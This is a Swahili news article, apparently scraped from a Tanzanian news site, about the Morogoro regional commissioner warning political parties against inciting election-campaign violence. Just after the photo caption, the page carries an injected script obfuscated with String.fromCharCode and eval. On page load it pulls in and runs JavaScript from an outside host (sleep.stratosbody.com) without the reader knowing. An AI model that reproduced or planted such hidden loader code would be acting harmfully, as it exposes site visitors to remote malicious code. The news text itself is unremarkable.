Recent Comments

Wavunjifu wa amani waonywa

By Baraka Bitariho Sep 14, 2015
<p>Mkuu wa Mkoa wa Morogoro, Dk Rajabu Rutengwe</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mkuu wa Mkoa wa Morogoro, Dk Rajabu Rutengwe
Mkuu wa Mkoa wa Morogoro, Dk Rajabu Rutengwe

KUU wa mkoa wa Morogoro, Dk Rajab Rutengwe, amevionya baadhi ya vyama vya siasa vinavyowashawishi vijana kufanya vurugu, kung’oa mabango ya wagombea, kurusha mawe, kuzomea, kutoa vitisho na lugha za matusi vikomeshe mambo hayo mara moja.

Pia amewataka viongozi wa kisiasa na dini kuwahimiza wafuasi pamoja na waumini wao waendelee kudumisha amani tuliyonayo na pia kuvumiliana katika kipindi hiki cha kampeni za uchaguzi, wakati wa uchaguzi wenyewe na wakati wa kutangaza matokeo ya uchaguzi.

Mkuu huyo wa mkoa alisema hayo katika hotuba yake wakati wa mkutano wa kudumisha amani wakati wa kampeni na kuelekea uchaguzi mkuu wa Oktoba 25, mwaka huu, uliofanyika juzi, katika ukumbi wa Bwalo la Umwema mjini Morogoro.

Mkutano huo ulioandaliwa na Jeshi la Polisi mkoa wa Morogoro uliwashirikisha wajumbe wa kamati ya ulinzi na usalama ya mkoa, wasimamizi wa uchaguzi jimbo la Morogoro, wazee, viongozi wa dini na wa vyama vya siasa, wagombea na wadau wengine wa sekta mbalimbali za binafsi.

Naye Kamanda wa Polisi Mkoa wa Morogoro, Leonard Paulo, alisema Jeshi la Polisi limejipanga kikamilifu katika kuhakikisha linakabiliana na matukio yoyote ya uvunjifu wa amani mkoani Morogoro.

Nao baadhi ya viongozi wa siasa walioshiriki mkutano huo, waliomba wasimamizi wa uchaguzi na Polisi kufuata sheria zinazowaongoza katika kusimamia ulinzi na masuala ya uchaguzi huo.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com